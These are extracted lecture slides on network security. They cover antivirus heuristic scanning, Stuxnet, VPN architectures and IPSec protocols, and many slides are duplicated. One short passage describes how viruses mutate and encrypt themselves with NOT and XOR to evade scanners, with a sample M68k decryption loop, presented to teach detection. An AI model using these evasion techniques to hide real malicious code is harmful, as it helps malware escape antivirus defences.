• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �

AV Countermeasure: heuristic search methods

Jordi Nin 2 - Network Security and Protection

Page 35: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Mutation examples

• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction

• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �

AV Countermeasure: heuristic search methods

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Search

Heuristic scanning looks for certain instructions or commandswithin a program that are not found in typical applications. Asa result, a heuristic engine is able to detect potentiallymalicious functionality in new (unexamined) maliciousfunctionality such as the replication mechanism of a virus

Classification of HS methods• weight-based systems rate every functionality that isdetected with a certain weight according to the degree ofdanger it may pose. If the sum of those weights reaches acertain threshold, an alarm is triggered (Quite old system)

• rule-based systems extract certain rules from a file andthis rules are compared against a set of rules for maliciouscode. If there matches a rule, an alarm is triggered

Jordi Nin 2 - Network Security and Protection

Page 36: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Search

Heuristic scanning looks for certain instructions or commandswithin a program that are not found in typical applications. Asa result, a heuristic engine is able to detect potentiallymalicious functionality in new (unexamined) maliciousfunctionality such as the replication mechanism of a virus

Classification of HS methods• weight-based systems rate every functionality that isdetected with a certain weight according to the degree ofdanger it may pose. If the sum of those weights reaches acertain threshold, an alarm is triggered (Quite old system)

• rule-based systems extract certain rules from a file andthis rules are compared against a set of rules for maliciouscode. If there matches a rule, an alarm is triggered

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Virtual Sandbox

to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine

when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined

modern scanners can detect new viruses for without signature

problem: heuristic scanning is computationally intensivereducing computers performance

Jordi Nin 2 - Network Security and Protection

Page 37: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Virtual Sandbox

to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine

when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined

modern scanners can detect new viruses for without signature

problem: heuristic scanning is computationally intensivereducing computers performance

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Virtual Sandbox

to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine

when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined

modern scanners can detect new viruses for without signature

problem: heuristic scanning is computationally intensivereducing computers performance

Jordi Nin 2 - Network Security and Protection

Page 38: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Components of a Heuristic Engine

1 variable/memory emulator

2 parser

3 flow analyzer

4 analyzer

5 disassembler/emulator

6 weight-based system and/or rule based system

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Components of a Heuristic Engine

1 variable/memory emulator

2 parser

3 flow analyzer

4 analyzer

5 disassembler/emulator

6 weight-based system and/or rule based system

Firstly, we normalize the input file removing bad formatting,renaming the variables, ...

Jordi Nin 2 - Network Security and Protection

Page 39: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Components of a Heuristic Engine

1 variable/memory emulator

2 parser

3 flow analyzer

4 analyzer

5 disassembler/emulator

6 weight-based system and/or rule based system

Then, it finds for the entry point

• binary files: only one

• script-based files: usually more than one (all should bechecked)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Components of a Heuristic Engine

1 variable/memory emulator

2 parser

3 flow analyzer

4 analyzer

5 disassembler/emulator

6 weight-based system and/or rule based system

Main loop:

1 Extract one instruction

2 Identify the operation

3 Update sandbox variables environment

Jordi Nin 2 - Network Security and Protection

Page 40: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Components of a Heuristic Engine

1 variable/memory emulator

2 parser

3 flow analyzer

4 analyzer

5 disassembler/emulator

6 weight-based system and/or rule based system

Finally, when the complete program is analyzed, the foundfunctionality can be rated (or compared with a set of rules)and decide if the program is clean or not

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Engines and Encrypted Viruses

Historically, heuristic engines could only assess what wasvisible to them

encrypted viruses caused them major problems

modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected

Jordi Nin 2 - Network Security and Protection

Page 41: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Engines and Encrypted Viruses

Historically, heuristic engines could only assess what wasvisible to them

encrypted viruses caused them major problems

modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Engines and Encrypted Viruses

Historically, heuristic engines could only assess what wasvisible to them

encrypted viruses caused them major problems

modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected

Jordi Nin 2 - Network Security and Protection

Page 42: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Engines and Encrypted Viruses

So how does an AV scanner identify an encryption loop?The presence of any combination of the following

conditions/instructions could indicate an encryption loop:

• initialization of a pointer with a valid memory address;

• initialization of a counter;

• memory read operation depending on the pointer;

• logical operation on the memory read result;

• memory write operation with the result from the logicaloperation;

• manipulation of the counter;

• branching depending on the counter.

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Heuristic Engines and Encrypted Viruses

So how does an AV scanner identify an encryption loop?The presence of any combination of the following

conditions/instructions could indicate an encryption loop:

• initialization of a pointer with a valid memory address;

• initialization of a counter;

• memory read operation depending on the pointer;

• logical operation on the memory read result;

• memory write operation with the result from the logicaloperation;

• manipulation of the counter;

• branching depending on the counter.

Jordi Nin 2 - Network Security and Protection

Page 43: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Encryption loop example (M68k assembler)

Decryption with eor and key 1Lea test(pc),a0Move.l #10, d0 ;counter.loopmove.b (a0), d1eor.b #1, d1 ;xor with key equal to 1move.b d1,(a0)+ ;move the offsetsubq.l #1,d0 ;update the counterbne.s .loop ;if d0 is not 0 jump to .loop

When the loop finishes the function pc is decrypt!

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Alternative to Antivirus

• When computer programs are installed from originalsupports (manufacturer sealed CD, DVD), it is possible tocalculate the hash of the installed files or directory andkeep this hash in a safe way (electronically signed).

• Then, before applications are executed, the hash of thefiles is calculated again, and compared with the originalone, to check that no changes have been made, i.e. notinfection.

Jordi Nin 2 - Network Security and Protection

Page 44: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Hot News

W32.Stuxnet is a worm that propagates on USB removable media drivesby taking advantage of ”Microsoft Windows Shortcut LNK FilesAutomatic File Execution Vulnerability”. It affects to the SCADA(Supervisory Control and Data Acquisition) systems deployed in lots ofindustrial systems, such as, nuclear or fuel refinement plants

Possible target: attack on Iran’s nuclear program

Online News

• Computer world UK

• ABC news

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples

Jordi Nin 2 - Network Security and Protection

Page 45: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Network Layer Security

Initially computer networks were used by academic researchersfor mail (or information in general) exchange

Security was not very important

Nowadays, this is not the case, millions of users use theInternet to access to their bank services, to buy products or

services, etc ...Then, we need to protect network communications at the layer

that is responsible for routing packets across networks

Jordi Nin 2 - Network Security and Protection

Page 46: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Network Layers Description

TCP/IP is widely used throughout the world to providenetwork communications. TCP/IP communications are

composed of four layers that work together

• Application layer sends and receives data for particularapplications, such as DNS, HTTP and SMTP

• Transport Layer provides connection-oriented (TCP) orconnectionless (UDP) services for transporting application layerservices between networks

• Network Layer routes packets across networks. Internet Protocol(IP) is the fundamental protocol

• Data Link Layer handles communications on the physical networkcomponents. The best-known data link layer protocol is Ethernet

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

The Need for Network Layer Security

Security controls exist for network communications at eachlayer of the TCP/IP model. The goal in each layer is

• Application layer Separate controls must be established for eachapplication. For example, Pretty Good Privacy (PGP) is commonlyused to encrypt e-mail messages (SMTP)

• Transport Layer Controls at this layer can be used to protect thedata in a single communication session between two hosts. Forexample (TLS / SSL) protocols secure HTTP traffic

• Network Layer Controls at this layer apply to all applications andare not application-specific. For example, IPSec secures all networkcommunications between two hosts without modifying applications

• Data Link Layer Controls are applied to all communications on aspecific physical link, such as a dedicated circuit between twobuildings or a dial-up modem connection to an ISP

Jordi Nin 2 - Network Security and Protection

Page 47: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Internet Protocol Security (RFCs 4301 & 4309)

IPSec is the most commonly used network layer security control. IPsec isa framework of open standards for ensuring private communications over

IP networks. Depending on its implementation, it can provide anycombination of the following types of protection:

• Confidentiality. IPsec can ensure that data cannot be read byunauthorized parties. This is accomplished by encrypting data usinga cryptographic algorithm and a secret key

• Integrity. IPsec can determine if data has been changed duringtransit. Data integrity can be assured by generating a messageauthentication code (MAC) value, a cryptographic data checksum

• Peer Authentication. Each IPsec endpoint confirms the identityof the other IPsec endpoint, ensuring that the network traffic anddata is being sent from the expected host

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Internet Protocol Security (RFCs 4301 & 4309)

IPSec is the most commonly used network layer security control. IPsec isa framework of open standards for ensuring private communications over

IP networks. Depending on its implementation, it can provide anycombination of the following types of protection:

• Replay Protection. The same data is not delivered multiple times,and data is not delivered out of order. However, IPsec does notensure that data is delivered in the exact order in which it is sent

• Traffic Analysis Protection. A person monitoring the traffic doesnot know which parties are communicating, how oftencommunications are occurring, or how much data is beingexchanged. However, the number of packets can be counted.

• Access Control. IPsec endpoints can perform filtering to ensurethat only authorized IPsec users can access particular networkresources

Jordi Nin 2 - Network Security and Protection

Page 48: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Virtual Private Networking (VPN)

The most common use of IPsec implementations is providingVirtual Private Networking (VPN) services

A VPN is a virtual network, built on top of existing physicalnetworks, that can provide a secure communications

mechanism for data and IP information transmitted betweennetworks

As VPNs can be used over the Internet, they facilitate thesecure transfer of sensitive data across public networks

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

VPN Advantages

• VPNs are often less expensive than alternatives such asdedicated private communications lines (e.g. X.25 lines)

• VPNs can also provide flexible solutions, such as securingcommunications between remote telecommuters (remoteworker) and the organization’s servers, regardless ofwhere the telecommuters are placed

• A VPN can even be established within a single network toprotect particularly sensitive communications from otherparties on the same network (e.g. servers administration)

Jordi Nin 2 - Network Security and Protection

Page 49: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

VPN & Cryptography

VPNs can use both private and public key cryptography

• Private key cryptography uses the same key for bothencryption and decryption, (e.g. DES, 3DES, AES, ...). Itis used for protecting the actual data because of itsrelative efficiency

• Public key cryptography uses separate keys forencryption and decryption, or to digitally sign and verify asignature (e.g. RSA, ...). It is used to authenticate theidentities of both parties

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples

Jordi Nin 2 - Network Security and Protection

Page 50: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Gateway-to-Gateway Architecture

IPsec-based VPNs are often used to provide secure networkcommunications between two networks by deploying a VPN gateway onto

each network and establishing a VPN connection between them.

Usually, to facilitate VPN connections, one of the VPN gateways issues arequest to the other to establish an IPsec connection. Routing on each

network is configured so that as hosts on one network need tocommunicate with hosts on the other network, their network traffic is

automatically routed through the IPsec connection

This is the easiest VPN model to implement, in terms of user and hostmanagement

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Host-to-Gateway Architecture

This model is used to provide secure remote access. The organizationdeploys a VPN gateway onto their network; each remote access user thenestablishes a VPN connection between his/her host and the VPN gateway

IPsec connections are created as needed for each individual VPN user.The user is typically asked by the VPN gateway to authenticate before

the connection can be established

The host-to-gateway model is somewhat complex to implement andmaintain in terms of user and host

Jordi Nin 2 - Network Security and Protection

Page 51: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Host-to-Host Architecture

This is the least commonly used VPN architecture. It is typically used forspecial purpose needs, such as system administrators performing remote

management of a single server.

This model is the only one that provides protection for data throughoutits transit. This can be a problem, because packet firewalls, IDS, andother devices cannot be placed to inspect the decrypted data, which

effectively circumvents certain layers of security

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Model Comparison

Feature G-to-G H-to-G H-to-HProvides protection between

No N/A N/Aclient and local gateway

Provides protection betweenYes Yes Yes

VPN endpoints

Protection between remote gatewayNo No N/A

and remote server (behind gateway)

Transparent to users Yes No NoTransparent to servers Yes Yes No

Jordi Nin 2 - Network Security and Protection

Page 52: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

IPSec Components

IPsec is a collection of protocols that assist in protectingcommunications over IP networks working together in various

combinations to provide protection for communications

Main protocols

• Authentication Header (AH). It provides integrity forpackets headers

• Encapsulating Security Payload (ESP). It providesauthentication and encryption services

• Internet Key Exchange (IKE). It negotiates, createsand manges security associations (AS)

Jordi Nin 2 - Network Security and Protection

Page 53: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Authentication Header (AH)

AH provides integrity protection for packet headers and data,as well as user authentication. It can optionally provide replayprotection and access protection. AH cannot encrypt any

portion of packets.

It is debatable its functionality since ESP also providesauthentication. However, AH is still of value because AH can

authenticate portions of packets that ESP cannot

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

AH Modes

AH provides integrity protection for the entire packet,regardless of which mode is used.

• Tunnel mode: AH creates a new IP header for eachpacket. It is used in gateways VPNsNew IP

AH HeaderOriginal IP Transport and Application

Header Header Protocol Headers and DataAuthenticated (Integrity Protection)

• Transport mode: AH does not create a new IP header.Itis used in host-to-host VPNs

IPAH Header

Transport and Application ProtocolHeader Headers and Data

Authenticated (Integrity Protection)

Jordi Nin 2 - Network Security and Protection

Page 54: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Integrity Protection Process

The first step of integrity protection is to create a hash byusing a keyed hash algorithm → a message authentication

code (MAC)

keyed hash algorithms create a hash based on both a messageand a secret key shared by the two endpoints. The hash is

added to the packet, and it is sent to the recipient.

The recipient can then regenerate the hash using the sharedkey and confirm that the two hashes match, providing integrity

protection for the packet

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Dynamic Header Fields

Certain IP header fields, such as time to live (TTL) and the IPheader checksum, are dynamic and may change during routine

communications

If the hash is calculated on all the original IP header values,the recalculated hash will be different.

To avoid this problem, IP header fields that may legitimatelychange in transit in an unpredictable manner are excludedfrom the integrity protection calculations

Jordi Nin 2 - Network Security and Protection

Page 55: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

NAT Problems

For the same reason as before AH is often incompatible withnetwork address translation (NAT) implementations

The IP source and destination address fields are included inthe AH integrity protection calculations

If these addresses are altered by a NAT device, the AHintegrity protection calculation made by the destination will

not match

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

AH Header

Next Header Payload Length ReservedSecurity Parameters Index

Sequence NumberAuthentication Information

• Next Header. It contains the IP protocol number for the next packet payload.In tunnel mode, the payload is an IP packet, so the Next Header value is set to4 for IP-in-IP. In transport mode, the payload is usually a transport-layerprotocol, often TCP (6) or UDP (17)

• Payload Length. This field contains the length of the payload in 4-byteincrements, minus 2

• Reserved. This value is reserved for future use, so it should be set to 0• Security Parameters Index (SPI). Each endpoint has an arbitrarily chosen SPI

value, which acts as a unique identifier for the connection. The recipient usesthe SPI value, along with the destination IP address and (optionally) the IPsecprotocol type to determine which Security Association (SA) is being used

• Sequence Number. Each packet is assigned a sequential sequence number, andonly packets within a sliding window of sequence numbers are accepted. Thisprovides protection against replay attacks

• Authentication Information. This field contains the MAC output

Jordi Nin 2 - Network Security and Protection

Page 56: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

How AH works

Example

ICMP echo request packet with transport modeit only contains a single IP header

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

How AH worksExampleAH header for the first four packets in an AH session between A and B

• SPI. A uses the hex value cdb59934 for the SPI in its packets, while host Buses the hex value a6b32c00 for the SPI in its packets. An AH connection iscomposed of two one-way connections, each with its own SPI

• SequenceNumber. Both hosts initially set the sequence number to 1, and bothincremented the number to 2 for their second packets

• Authentication Information. The authentication (integrity protection)information, a keyed hash based on the bytes in the packet, is different in eachpacket. It should be different even if only one byte in a hashed section changes

Jordi Nin 2 - Network Security and Protection

Page 57: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Encapsulating Security Payload (ESP)

ESP is the second core IPsec security protocol. It providesboth encryption for packet payload data and authentication toprovide integrity protection (although not for the outermost IP

header)

ESP’s encryption and authentication can be disabled

ESP can be used to provide only encryption; encryption andintegrity protection; or only integrity protection

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Modes

• Tunnel mode: It creates a new IP header for each packet. The new IP headerlists the endpoints of the ESP tunnel as the source and destination of thepacket.

New IP ESP Original IP Transport and Application ESP ESP Auth.Header Header Header Protocol Headers and Data Trailer (optional)

EncryptedAuthenticated (Integrity Protection)

It can encrypt and/or protect the integrity of both the data and the original IPheader. Encrypting the data protects it from being accessed or modified byunauthorized parties; encrypting the IP header conceals the nature of thecommunications, such as the actual source or destination of the packet. Ifauthentication is being used for integrity protection, each packet will have anESP Authentication section after the ESP trailer

Jordi Nin 2 - Network Security and Protection

Page 58: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Modes

• Transport mode: it uses the original IP header instead of creating a new one.

IP ESP Transport and Application ESP ESP Auth.Header Header Protocol Headers and Data Trailer (optional)

EncryptedAuthenticated (Integrity Protection)

It can only encrypt and/or protect the integrity of packet payloads and certainESP components, but not IP headers. As with AH, ESP transport mode isgenerally only used in host-to-host architectures. Also, transport mode isincompatible with NAT

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Encryption Process

ESP uses symmetric cryptography to provide encryption forIPsec packets. Both endpoints must use the same key to

encrypt and decrypt the packets.

When an endpoint encrypts data, it divides the data into smallblocks (e.g. for the AES algorithm, 128 bits each), and thenperforms multiple sets of cryptographic operations using the

data blocks and shared key

When the other endpoint receives the encrypted data, itperforms decryption using the same key and a similar process

Jordi Nin 2 - Network Security and Protection

Page 59: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Packet Fields

Each ESP header is composed of two fields:• SPI. Each endpoint of each IPsec connection has an arbitrarily chosen SPI

value, which acts as a unique identifier for the connection. The recipient usesthe SPI value, along with the destination IP address and (optionally) the IPsecprotocol type (in this case, ESP), to determine which SA is being used

• SequenceNumber. Each packet is assigned a sequential sequence number ,andonly packets within a sliding window of sequence numbers are accepted. Thisprovides protection against replay attacks

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Packet Fields

The next part of the packet is the payload. It is composed of• Payload data. It is is encrypted,

• Initialization vector (IV). It is not encrypted.The IV is used during encryption.Its value is different in every packet, so if two packets have the same content,the inclusion of the IV will cause the encryption of the two packets to havedifferent results

Jordi Nin 2 - Network Security and Protection

Page 60: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Packet Fields

The third part of the packet is the ESP trailer, which contains• Padding. An ESP packet may optionally contain padding, which is additional

bytes of data that make the packet larger and are discarded by the packetsrecipient. Because ESP uses block ciphers for encryption, padding may beneeded so that the encrypted data is an integral multiple of the block size

• Padding Length. This number indicates how many bytes long the padding is

• Next Header. In tunnel mode, the payload is an IP packet, so the Next Headervalue is set to 4 for IP-in-IP. In transport mode, the payload is usually atransport-layer protocol, often TCP (6) or UDP (17)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP Packet Fields

If ESP integrity protection is enabled, the ESP trailer is followed by an AuthenticationInformation field. As in AH header It contains the field contains the MAC output.Unlike AH, the MAC in ESP does not include the outermost IP header in itscalculations

Jordi Nin 2 - Network Security and Protection

Page 61: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

How ESP works

Example

It contains five sections: Ethernet header, IP header, ESPheader, encrypted data (payload and ESP trailer), and

(optionally) authentication information. From the encrypteddata, it is not possible to determine if this packet was

generated in transport mode or tunnel mode.

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

How ESP works

Example

ESP header for the first four packets in an AH session betweenA and B

The SPI and Sequence Number fields work the same way inESP that they do in AH.

Jordi Nin 2 - Network Security and Protection

Page 62: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Internet Key Exchange (IKE)

IKE protocol negotiates, creates, and manages securityassociations (SA). SA is a generic term for a set of values thatdefine the IPsec features and protections applied to aconnection

IKE protocol has two phases:

• Phase One Exchange → IPsec endpoints tosuccessfully negotiate a secure channel (IKE SA) throughwhich an IPsec SA can be negotiated

• Phase Two Exchange → The purpose of phase two isto establish an SA for the actual IPsec connection

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Phase One Exchange Modes

• Main mode. It negotiates the establishment of the IKESA through three pairs of messages

1 In the first pair of messages, each endpoint proposesparameters to be used for the SA

2 The second pair of messages performs a key exchangethrough Diffie-Hellman

3 In the third pair of messages, each endpoint isauthenticated to the other

Jordi Nin 2 - Network Security and Protection

Page 63: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Phase One Exchange Modes

• Aggressive mode. It offers a faster alternative to mainmode. It negotiates the establishment of the IKE SAthrough three messages

1 In the first message, endpoint A sends all the protectionsuite parameters, as well as its portion of theDiffie-Hellman key exchange, a nonce, and its identity

2 In the second message, endpoint B sends the protectionsuite parameters, its portion of the Diffie-Hellman keyexchange, a nonce, its identity, and its authenticationpayload (through digital signature or hash)

3 In the third message, endpoint A sends itsauthentication payload

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Phase One Exchange

In the phase one, each endpoint proposes parameters for theSA. The four mandatory parameters are referred to asprotection suite

• Encryption Algorithm. This specifies the algorithm tobe used to encrypt data, e.g. DES, 3DES, AES, ...

• Integrity Protection Algorithm. This indicates whichkeyed hash algorithm should be used for integrityprotection, e.g. HMAC-MD5, HMAC-SHA-1, ...

• Diffie-Hellman (DH) Group. It is used to generate ashared secret for the endpoints in a secure manner.

• Authentication Method. There are several possiblemethods for authenticating the two endpoints (Pre-sharedKeys, Digital Signatures, ... )

Jordi Nin 2 - Network Security and Protection

Page 64: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Phase Two Exchange

The purpose of phase two is to establish an SA for the actualIPsec connection (IPSec SA). IPSec SA connection is createdusing three messages:

• In the first message, endpoint A sends keys, nonces, andIPsec SA parameter suggestions. The nonces are ananti-replay measure

• In the second message, endpoint B sends keys, nonces,and IPsec SA parameter selections, plus a hash forauthentication

• In the third message, endpoint A sends a hash forauthentication

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples

Jordi Nin 2 - Network Security and Protection

Page 65: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP in a Gw-to-Gw Architecture

The goal is to establish an IPsec connection that providesencryption and non complete integrity protection servicesbetween endpoints (gateways) A and B. Initially, we have tocreate an IKE SA, as follows:

1 Endpoint A creates and sends a regular (non-IPsec)packet that has a destination address of endpoint B

2 Network A routes the packet to gateway A

3 Gateway A receives the packet and performs NAT,altering the packet’s source IP address

4 Gateway A initiates an IKE SA negotiation with GatewayB using either main mode or aggressive mode. At the endof the negotiation, the IKE SA is created

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

ESP in a Gw-to-Gw ArchitectureThe next step is to create the IPsec SA, as follows:

5 GW A uses the parameters set in the IKE SA to initiate anIPsec SA negotiation with GW B. ESP tunnel mode is used

6 Once the two IPsec SAs are created, gateway A finishesprocessing the packet sent by endpoint A in the step 1:

1 GW A modifies the packet in accordance with the SAparameters: A new IP packet header is added (sourceIP: GW A and destination IP: GW B), encrypting thedata and adding the authentication information

2 Gateway A then sends the packet to Gateway B3 GW B receives the packet and uses the SPI value in the

unencrypted ESP header to determine the SAparameters. GW B processes and validates the packet:remove the additional IP header, check the integrity anddecrypt the original payload

4 GW B sends the packet to endpoint BJordi Nin 2 - Network Security and Protection

Page 66: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

AH and ESP in a Gw-to-Gw Architecture

The goal is to establish an IPsec connection that providesencryption and complete integrity protection (includingheaders) services between endpoints (gateways) A and B

Steps 1-4 are identically to the previous example

5 Gateway A uses the parameters set in the IKE SA toinitiate an IPsec SA negotiation with gateway B for theAH service. The IKE SA provides protection for thenegotiation of the AH tunnel mode

6 Step 5 is repeated to negotiate the SAs for the ESPservice

Jordi Nin 2 - Network Security and Protection